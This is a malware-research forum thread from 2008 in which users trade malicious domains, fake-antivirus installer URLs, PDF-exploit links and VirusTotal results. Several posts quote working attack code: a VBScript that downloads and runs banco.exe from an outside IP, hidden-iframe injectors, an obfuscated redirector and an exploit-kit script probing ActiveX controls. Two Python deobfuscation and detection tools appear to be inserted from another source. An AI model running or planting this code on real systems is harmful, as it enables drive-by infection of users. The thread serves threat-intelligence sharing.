Malware Domain List
Malware Related => Malicious Domains => Topic started by: lanvin on September 07, 2008, 07:26:41 pm
-
20080908...
-
20080909
-
-
-
-
And what a surprise, lol... more crap hosted on the same IP, obviously...
hxxp://antivirusxp-2008.net (EstDomains)
hxxp://stat.antivirusxp-2008.net/download/16/AntivirusXP2008Installer.exe (EstDomains)
-
-
Read this blog article:
http://s3cwatch.wordpress.com/2008/09/11/wwwok2bstr8comindex_13html/
There is a lot more of such crap.
http://www.google.com/search?q=%22ActiveX+Object+to+play+this+video+file%22+%22HARDCORE+VIDEO+ONLINE%22&site=intl&filter=0
Example from Google links:
www.hot9.ru/index.php?p_id=138
links to
http://softload2009q.com/download/502/1410/0/
which downloads MediaTubeCodec_ver1.1410.0.exe.
VT result:
http://www.virustotal.com/de/analisis/e040a14bb3b30e35eaf59a141d5e37b6
-
http://www.host1550.com/modulos/gera.jpg
http://loaddds.com/file.exe
http://security-prof.com/2009/download/trial/AV2009Install_77024207.exe
http://m.c5x8.com/mm.exe
-
-
-
Site Domain: 0catch.com
Site Location: United States of America
Threat links on this site (part of them):
Site Domain: 218.22.180.43
Site Location: China
Threat links on this site (part of them):
-
Thanks Lanvin, I somehow missed this topic but much appreciate the links. :P
-
[quote author=CM_MWR link=topic=2207.msg5599#msg5599 date=1221389857]
Thanks Lanvin, I somehow missed this topic but much appreciate the links. :P
m/config/config.dll
dig from your post:)
-
http://reda-vision.com/config.exe
http://www.virustotal.com/analisis/a10b9cdb94e166d12caed1093db639ac
More info about it here:
http://www.cs.ucsb.edu/~marco/blog/2008/09/backdoored-php-shells.html
-
Thank you.
-
Pinches here...
hxxp://ks4sk.fatal.ru/1/1.php
hxxp://mechta2.freehostia.com -> Open dir, check for logs and other stuff there...
hxxp://skkeyg.freehostia.com -> Open dir, check for logs and other stuff there...
Hunting for Pinches really pays back sometimes...
hxxp://c.bestnews.cc/e/buf.png -> Result: 0/36 (0%)
http://www.virustotal.com/analisis/54a9ba01bdd03fce710d9cceafb0d2e4
hxxp://c.bestnews.cc/e/mov.qt -> Result: 2/36 (5.56%)
http://www.virustotal.com/analisis/5ac531f64205150158da7b6d6153e8ea
hxxp://c.bestnews.cc/file.php?o=7&q=2&w=fire -> Result: 13/36 (36.12%)
http://www.virustotal.com/analisis/bad64f314a091e12a1957a252cd3f5c0
Also dug a webshell from there...
hxxp://bestnews.cc/tools.rar
All stuff from bestnews.cc added in attachment, note that it's NOT password-protected...
-
dig.......:)
-
http://2.trojan8.com/dd/1.exe
http://2.trojan8.com/dd/2.exe
http://2.trojan8.com/dd/6.exe
http://2.trojan8.com/dd/9.exe
-
zango.com
180solutions.com
http://bis.180solutions.com/downloads/msbb.exe
hotbar.com
zangocash.com
http://static.zangocash.com/Setup/53/Zango/Setup.exe
http://static.zangocash.com/Setup/53/Seekmo/Setup.exe
please dig
gophergas.com
albinoblacksheep.com
simtel.net
-
www.ulitka.de
has code
<SCRIPT language=VBScript>
on error resume next
dl = "http://210.202.194.167/banco.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="http://www.ulitka.de/index2.html"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</SCRIPT>
to download
http://210.202.194.167/banco.exe
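The script above hides ADODB.Stream by gluing it together from four short literals, which defeats a naive string match. As an added example (my code, not from the thread), the following Python scanner folds such `&` concatenation chains back into plain strings and then flags the XMLHTTP + ADODB.Stream + SaveToFile/ShellExecute chain; the sample input is the quoted script, and the function names are mine.

```python
import re

# Sample input: the downloader quoted in the post above (www.ulitka.de), copied as posted.
SAMPLE_VBS = """on error resume next
dl = "http://210.202.194.167/banco.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="http://www.ulitka.de/index2.html"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
"""

ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")      # name = expr (skips "Set x = ...")
STRING_RE = re.compile(r'"([^"]*)"')                        # one VBScript string literal
OPEN_RE = re.compile(r"\.open\s+(\w+)\s*,\s*(\w+)", re.I)   # x.Open method, url, ...
URL_RE = re.compile(r"https?://[^\s\"']+")

# Components whose co-occurrence is the classic download-and-execute pattern.
INDICATORS = {
    "xmlhttp": re.compile(r"(?:microsoft|msxml2)\.xmlhttp", re.I),
    "adodb_stream": re.compile(r"adodb\.stream", re.I),
    "save_to_disk": re.compile(r"\bsavetofile\b", re.I),
    "shell_exec": re.compile(r"shell\.application|\bshellexecute\b|wscript\.shell", re.I),
}


def split_concat(expr):
    """Split an expression on '&' operators that sit outside string literals."""
    parts, cur, in_str = [], "", False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "&" and not in_str:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    parts.append(cur.strip())
    return parts


def fold_constants(script):
    """Resolve `name = "lit" & other & ...` chains to plain strings; a later
    non-literal reassignment (fname1= F.BuildPath(...)) leaves the earlier value alone."""
    env = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, value = m.group(1), ""
        for part in split_concat(m.group(2)):
            lit = STRING_RE.fullmatch(part)
            if lit:
                value += lit.group(1)
            elif part in env:
                value += env[part]
            else:
                value = None
                break
        if value is not None:
            env[name] = value
    return env


def analyse(script):
    """Score a VBScript fragment for the XMLHTTP + ADODB.Stream + ShellExecute chain."""
    env = fold_constants(script)
    # Search the folded strings too, so "Ado"&"db."&"Str"&"eam" is matched as ADODB.Stream.
    haystack = script + "\n" + "\n".join(env.values())
    hits = {name: bool(rx.search(haystack)) for name, rx in INDICATORS.items()}
    # Resolve the variables handed to .Open, giving the HTTP method and the fetched URL.
    fetched = [(env.get(m, m), env.get(u, u)) for m, u in OPEN_RE.findall(script)]
    verdict = hits["xmlhttp"] and hits["adodb_stream"] and (hits["save_to_disk"] or hits["shell_exec"])
    return {
        "indicators": hits,
        "resolved": env,
        "fetched": fetched,
        "urls": sorted(set(URL_RE.findall(haystack))),
        "download_and_execute": verdict,
    }
```

Run `analyse(SAMPLE_VBS)` to see the folded `str5` value, the resolved GET of banco.exe, and the positive verdict; a benign fragment such as a MsgBox call produces no hits.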
-
Thanks.
-
prtectionactivescan.com
http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164437.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.freewebs.com/chipxinh503/GirlKuTe.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cao-2.cn/Real10.js
http://www.cao-1.cn/Real10.js
http://202.106.195.23:6688/aicss_test241.css (invalid)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
as-pro-xp-download.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
91.121.138.222
http://91.121.138.222/~warman24/Setup_ver1.1706.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
allinonespy.com
http://www.allinonespy.com/all-in-one-spy.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ppexe.com/
-
blazingtools.com
http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
swmirror.com
http://dreamingsoft.swmirror.com/fcsetup.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
facaizhifuok.cn
http://facaizhifuok.cn/hb/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
Thanks Lanvin,
Some fun to play with
-
Thanks Lanvin,
Some fun to play with
~~~~~
Hi CM_MWR,
Thank you very much :)
-
-
And a special one as well, lol... that also earned Google's malware prevention warning, he-he...
http://www.google.com/search?hl=en&q=dlockley.com
hxxp://dlockley.com/
-
http://mdrop.md.funpic.org/habbo%20tools/flooder/macrotool.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hipapatam.com/Client20.1531.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://dl-updates.freehostia.com/vc.txt (pe)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bopings.com/a.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.kasdbrs.com/ld_vp002.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
http://www.6rb-ksa.com/vip.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://tudoforum.webcindario.com/verdinho.jpg PE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pointcashbag.com/cashback/download/install.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://avzhan.3322.org:81/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org/dl.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-
Another Fake Antivirus.
hxxp://your-windows-scanner.com/soft/r/AV2008install.exe
Virustotal
http://www.virustotal.com/analisis/9c6df880a6b4dee045da0543cb91bbed
hxxp://scanner.microantivirus2009.com/setup/install_511_MHwzNnwwfHx8fHx8fHw_.exe
VirusTotal
http://www.virustotal.com/analisis/6aee6527bd9aa13231eb0d831a0569d0
-
Spam related (DirectMailer) open dirs...
Google gives a warning in quite a few of them,
so I assume that other 'goodies' might exist there as well,
but I haven't personally bothered checking in such detail...
-
haitou.php is certainly a pain in the ass to decode, scripts attached below...
-
...out of curiosity, I scanned the 'haitou-scripts-only.php' in VirusTotal:
http://www.virustotal.com/analisis/bed224b3a6050bdfd8826049f4755202
Result: 3/36 (8.34%)
The only part of it which is in plain text view is the following...
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
As soon as I replaced xanjan.cn with google.com...
http://www.virustotal.com/analisis/9cc7dae965c757c745a80eb4c424b65e
Result: 2/36 (5.56%)
And when removing the whole of the aforementioned plain text script...
http://www.virustotal.com/analisis/63ed068268e977a32b92f70e7076f977
Result: 1/36 (2.78%)
In short, besides the... high-tech strings-based detection,
almost no AV got alarmed by the remaining 5 heavily obfuscated scripts there?
-
-
hxxp://funciclearin.com/counter.php
hxxp://search-you-need.com/le/index.php?code=K2l7J41xQY
hxxp://www.mnbenio.ru/script.js
-
Hi sowhat-x,
here is the haitou.php thing. Lines separated by "--------------".
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')
----------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
----------------
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111115&ref='+escape(document.referrer)+'"></sc'+'ript>')
}
----------------
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
-----------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
-------------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
-
...so except from xanjan.cn... this haitou.php, is it supposed to be phishing related or something?
Or is it some weird kind of stats-tracking? ???
coi.html and/or coiu.html were found on many servers that hosted this obfuscated haitou.php...
Edit: Yeap, it's phishing related indeed, just checked a random coiu.html...
What's weird (and annoying also) is that earlier its contents were... different! :o
Can't remember though what they contained.... :(
-
Heh... google the text, not the redirections.
allyourbasebelongstous
yahoo--> /haitou.php
1 - 10 of 12,200 and it's way old too, with all these still lurking and steadily infecting.
Remember the lot of links I posted in private where the browser went into an infinite loop... ;)
I have used Google, MSN and Yahoo for this search term for well over 4 months and still to this day get jam up hits for malware rotators.
When looking in some directories you'll start seeing patterns ---> system_.php, move.html, r.html and several others.
It's a part of a very large whole from the beginning of the year, one of those injections we all talked about way back.
-
...so except from xanjan.cn... is it supposed to be phishing related or something?
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')
means: if your referrer is a search engine (you came to this page from a search engine),
then it redirects you to personal.count....
You will get the following script from this URL.
function S(hF,e){if(!e){e='1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';}var x;var Rg='';for(var I=0;I<hF.length;I+=4){x=(e.indexOf(hF.charAt(I))&255)<<18|(e.indexOf(hF.charAt(I+1))&255)<<12|(e.indexOf(hF.charAt(I+2))&255)<<(6)|e.indexOf(hF.charAt(I+3))&255;Rg+=String.fromCharCode((x&16711680)>>16,(x&65280)>>8,x&255);}eval(Rg);}S('d4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S');
decodes to
document.write('<sc'+'ript> document.location="http://go-scan-pc.com/?uid=152" </sc'+'ript>');
go-scan-pc.com (ESTDOMAINS) has no content at the moment.
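The S() function above is ordinary base64 with a private 64-symbol alphabet and no padding, so the stage it feeds to eval() can be recovered statically. The following Python port is an added example (my code, not from the thread); the script text is copied from the post, and the function names are mine.

```python
import re

# The obfuscated redirector exactly as quoted in the post: decoder S() with its
# custom alphabet, followed by the encoded payload it eval()s.
OBFUSCATED_JS = "function S(hF,e){if(!e){e='1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';}var x;var Rg='';for(var I=0;I<hF.length;I+=4){x=(e.indexOf(hF.charAt(I))&255)<<18|(e.indexOf(hF.charAt(I+1))&255)<<12|(e.indexOf(hF.charAt(I+2))&255)<<(6)|e.indexOf(hF.charAt(I+3))&255;Rg+=String.fromCharCode((x&16711680)>>16,(x&65280)>>8,x&255);}eval(Rg);}S('d4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S');"

ALPHABET_RE = re.compile(r"e='([^']{64})'")          # the default alphabet inside S()
PAYLOAD_RE = re.compile(r"\bS\('([^']*)'\)")          # the S('...') call at the end
LOCATION_RE = re.compile(r'document\.location\s*=\s*"([^"]+)"')


def decode_custom_b64(payload, alphabet):
    """Port of S(): 4 alphabet symbols -> one 24-bit value -> 3 bytes.

    Same bit layout as base64, but with the attacker's alphabet and no '=' padding.
    Returns the decoded text instead of eval()ing it.
    """
    if len(alphabet) != 64:
        raise ValueError("alphabet must have exactly 64 symbols")
    out = bytearray()
    for i in range(0, len(payload), 4):
        chunk = payload[i:i + 4]
        idx = []
        for j in range(4):
            if j >= len(chunk):
                idx.append(0)  # JS charAt() past the end is '' and indexOf('') is 0
                continue
            pos = alphabet.find(chunk[j])
            if pos < 0:  # the JS would silently use -1 & 255; fail loudly instead
                raise ValueError(f"symbol {chunk[j]!r} is not in the alphabet")
            idx.append(pos)
        x = (idx[0] << 18) | (idx[1] << 12) | (idx[2] << 6) | idx[3]
        out += bytes([(x >> 16) & 0xFF, (x >> 8) & 0xFF, x & 0xFF])
    return out.decode("latin-1")  # String.fromCharCode() yields code points 0-255


def deobfuscate(js):
    """Pull the alphabet and payload out of the script text and decode them offline."""
    alpha, payload = ALPHABET_RE.search(js), PAYLOAD_RE.search(js)
    if not (alpha and payload):
        raise ValueError("decoder alphabet or S('...') call not found")
    return decode_custom_b64(payload.group(1), alpha.group(1))


def redirect_target(decoded):
    """Return the URL the decoded stage sends the browser to, or None."""
    m = LOCATION_RE.search(decoded)
    return m.group(1) if m else None


if __name__ == "__main__":
    stage = deobfuscate(OBFUSCATED_JS)
    print(stage.strip())
    print("redirects to:", redirect_target(stage))
```

The decoded stage ends in two trailing spaces because the last 4-symbol group carries only one real byte; strip them before comparing.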
-
go-scan-pc.com redirs to;
http://scan-ia.com/20/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1
Which gives you an 84K file (UPolyX v0.5 packed according to UE);
http://scan-ia.com/download/IAInstall.exe
-
Detection is rubbish (3/36)
/edit
Just for kicks and giggles ;)
http://hosts-file.net/?s=216.32.69.165
http://hosts-file.net/?s=216.32.69.165&sDM=1#matches
I had 9 already listed ..... I've now got 48 on this IP :)
-
go-scan-pc.com
scan-ia.com
= ESTDOMAINS
KOKACH !!
-
I'd be surprised if they weren't all Est ......... "cleaning up" my arse .....
-
Detection is rubbish (3/36)
Report from Anubis:
http://anubis.iseclab.org/result.php?taskid=a2867294c98294b4c5be525712d4473a&refresh=1
IAInstall.exe downloads
hxxp://ia-install.com/download/InternetAntivirus.exe
http://www.virustotal.com/de/analisis/612efcc0065c050fb49876f6a82f476b
-
you'll start seeing patterns ---> system_.php,move.html,r.html and several others.
That's why I said... ;)
"Whatever the case, all of the following are open dirs,
so you can examine directories/scripts contained there at will..."
And there's even more crap planted there per occasion except from the above patterns,
but I didn't have the patience to try following them over...
go-scan-pc.com
scan-ia.com
= ESTDOMAINS
KOKACH !!
(UPolyX v0.5 packed according to UE);
At least at a first glance, it seems to be a home-made protection, but I may be wrong on this...
it's been years since I had checked UPolyX... maybe I should do so again ;)
-
-
I agree, the thread here has already got messy... and it's my fault.
I'll edit/move the haitou.php links I've posted into a new thread...
-
nice discussion ;D
-
Lol! :D
-
nice discussion ;D
I'm sorry. This was your thread. We have messed it up. ;D
-
Blame it on TJS :P
-
lol
-
-
Thank you.
-
nice discussion ;D
I'm sorry. This was your thread. We have messed it up. ;D
That's ok:)
Glad to see your discussion :P
-
-
-
phishing:
hxxp://mess.network-hosting.com/pey/Confirm.htm
fake alert:
nod-32.net
porn:
bestyounggirls.com
enakedgirls.com
previewadultvideos.com
-
eigenstart.nl
hxxp://www.eigenstart.nl/toolbar/content/eigenstartsetup.exe
myspyprotector.com
hxxp://www.myspyprotector.com/software/myspyprotector_04.exe
hxxp://www.myspyprotector.com/software/myspyprotector_03.exe
hxxp://www.myspyprotector.com/software/myspyprotector_05.exe
pic iframe
hxxp://picturelink.66735.com/member/img/reg.gif
hxxp://picturelink.66735.com/plus/img/file_move.gif
hxxp://picturelink.66735.com/plus/img/sysinfo.gif
hxxp://picturelink.66735.com/plus/img/bad.gif
visualscanprotection.com
hxxp://visualscanprotection.com/download/av_2009.exe
-
Thank you.
-
Fake alert
uav2008.com
bestprivatetube.net
antivirus-2009-pro.net
Porn
hardxtc.com
olderporntubes.com
hxxp://www.bestprivatetube.net/cd/603/5/wmcodec_update.exe
-
Adwares
-
Fake antivirus
eantivirus-payment. com
e-antiviruspro. com
Porn
lamaporn.com
ebony-black-pussy.net
Trojan
hxxp://www.yyjjoopp.com/abc.exe
hxxp://exetools.com/files/unpackers/win/ni2untelock.zip
hxxp://exetools.com/files/stickers/exebind.zip
hxxp://exetools.com/files/others/ratpackr.zip
-
http://msn.account.hotmail.ru/Cancelar.exe
http://albumbloglinda.hotmail.ru/album.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://zfzuguo.cn/hb/24.exe
http://zfzuguo.cn/hb/7.exe
http://zfzuguo.cn/goole10.exe
-
hxxp://msn.account.hotmail.ru/Cancelar.exe
Great domain name. lol.. thx for sharing.
TJS
-
from hxxp://zfzuguo.cn/updater.txt
-
Thanks for sharing :)
-
http://www.ecotopo.com.au/
open dir
-
hxxp://www.zssotke.edu.sk/zdruzenacik/explorer-7.0.exe
hxxp://blacktie-affair.org/Smileys/Zamiana/stick.gif
||
<iframe width=1 height=1 src="hxxp://download.getmirar.com/875455"> </iframe>
||
hxxp://download.getmirar.com/875455/exes/Mirar_Toolbar_Setup.exe
hxxp://ak.imgfarm.com/images/nocache/copilot/1.0.8.0/iWonSetup1.0.8.0.exe
hxxp://www.cliprex.com/files/Cflv.exe
hxxp://www.cliprex.com/files/CliprexLite.exe
-
hxxp://myprivatetube.net/cd/376/0/wmcodec_update.exe
hxxp://myprivatetube.net/cd/174/0/wmcodec_update.exe
hxxp://scanner.rapidantivirus.com/setup/install_4876_MHw0MXwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
hxxp://www.nortonsoft.com/supportlogic/smilies/video-nude-anjelia.avi.exe
-
-
Thanks.
-
trojan zlob
http://ticketmoon.net/download/pageticket2000.exe
fake
http://download.antispywareexpert.com/ASE_Setup_Free.exe
http://download.antispywareexpert.com/ASE_Setup_Free_fr.exe
http://www.xprivatetube.com/cd/26/2001/wmcodec_update.exe
http://www.xprivatetube.com/cd/680/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/184/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/603/4/wmcodec_update.exe
http://xprivatetube.com/cd/wmcodec_update.exe
-
-
-
Thanks.
-
hxxp://online-scan.net/jktnslbngksjhgktiyyorrfkgmtt.js
-
-
-
Thanks.
-
http://www.726380.cn/001/022.exe
http://www.adwareblaster.com/download/bpssr.exe
http://save-my-pc-now.com/2009/download/trial/A9installer_770522166818.exe
http://www.antispyware-xp2009.com/install/Installer.exe
http://contenteraser.com/privacy/js/order.js
-
-
-
-
-
http://bot.10wrj.com/bot1102.exe
http://so.91526.com/jj.exe
-
http://freegoogla.vicp.net/download/em_setup.exe
http://zz.ushealthmart.com/download/6767.exe
-
...since a few days have passed since the fuss around the ms08-067 worm,
I thought it's about time to move these here as well... ;)
-
thank you ;D
-
thank you ;)
-
-
Various pdf-exploit variants, and different detection rates for the time being...
hxxp://218.93.205.42/cache/doc.pdf
hxxp://megsrdomain.cn/tor/exploits/pdf/2.pdf
hxxp://myfrooogle.cn/z/cache/doc.pdf
hxxp://nudeteens.in/4/cache/doc.pdf
-
...Hopefully these are enough pdf samples for people out there? ;)
-
-
Small present for all malware hunters around... the list is updated daily - have fun... :)
http://www3.malekal.com/exploit.txt
Credits for the hard work to be given where they should... and that is, to Malekal:
http://forum.malekal.com/index.php
-
I am doing a short write-up for my blog on the PDF exploits and was wondering if I could use some of these samples in my write-up? I will cite the source as MDL and the individuals who collected the samples, such as sowhat, if you all allow me to use them. I just want to get your permission before I do the write-up; thanks in advance either way.
-
cjeremy, you don't need to reference anyone, after all,
most of them were found simply via googling... then sorting/removing dupes etc...
When I stumble upon kinda large amounts of stuff
that was already spotted and posted by other people in public
(e.g. like the referenced material above that was gathered by Malekal),
I personally always give the reference/credits/link to the post in question as well...
That is both for people to be able to follow the updates there by themselves,
plus for common reasons of politeness obviously... and that's all there is to it. :)
Waiting for a good write-up with detailed analysis over at Sudosecure ;)
-
Thank you :)
-
hxxp://ascoprguide.net/lel/load.php?xpl=pdf
It spawns 'load.exe'...Result: 6/35 (17.14%)
http://www.virustotal.com/analisis/d1e1d25d68004d4c8a3b2ad5e87174e9
hxxp://ascoprguide.net/lel/config/test.pdf
Result: 10/36 (17.14%)
http://www.virustotal.com/analisis/18a2be6aeec85eceea9ffa8fee14fb43
And it's EstDomains... from the same IP also:
hxxp://bestansia.net/lel/config/test.pdf
Result: 10/36 (27.78%)
http://www.virustotal.com/analisis/c529319c11a5eecb6318ecc2cfe6417f
hxxp://bestratebid.net/botout/test.pdf
Result: 12/36 (33.34%)
http://www.virustotal.com/analisis/2d33f75cf7dda11517a955de05bf4b00
hxxp://bestratebid.net/botout/load.php?xpl=mdac
Result: 6/36 (16.67%)
http://www.virustotal.com/analisis/cd62f24af130e17769147181f78a3f81
No other domains seem to exist on this IP...
http://www.robtex.com/ip/64.86.16.11.html
-
hxxp://2.gooanal.net/sis/getfile.php?f=pdf
Result: 9/36 (25.00%)
http://www.virustotal.com/analisis/70473d5c4c6da5906a23e02a06aa38f5
hxxp://dortumosio.com/11/pdf.php
Result: 11/36 (30.56%)
http://www.virustotal.com/analisis/4ac9dbbd008674a3608d641a6901baa1
-
-
91.203.93.61/25/2/getfile.php?f=pdf
beshragos.com/work/getfile.php?f=pdf
and some more in this nice article
http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html
-
hxxp://uin5.cn
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://sllwbd2.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd2.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.zghncsq.cn\/b2.htm width=50 height=0><\/iframe>")
hxxp://sllwbd2.cn/a1/ilink.html
hxxp://sllwbd2.cn/a1/flink.html
contain some flash exploits
http://www.virustotal.com/analisis/9bc0c8341d75029f720ae8bccb382691 14/36
http://www.virustotal.com/analisis/366887d40b9994e8652cbe7961fefcf6 14/36
http://www.virustotal.com/analisis/b4fe9309a779516d75886e3222f975b2 14/36
http://www.virustotal.com/analisis/b3618fd15fc152e18089c22a9c97fb65 14/36
http://www.virustotal.com/analisis/18634c476617d3855b49a3901437389d 14/36
hxxp://www.zghncsq.cn/b2.htm
takes you to
hxxp://sllwbd2.cn/a1/fxx.htm
with some more exploits
<script>
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=ss.html></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://sllwbd2.cn/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://sllwbd2.cn/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
test();
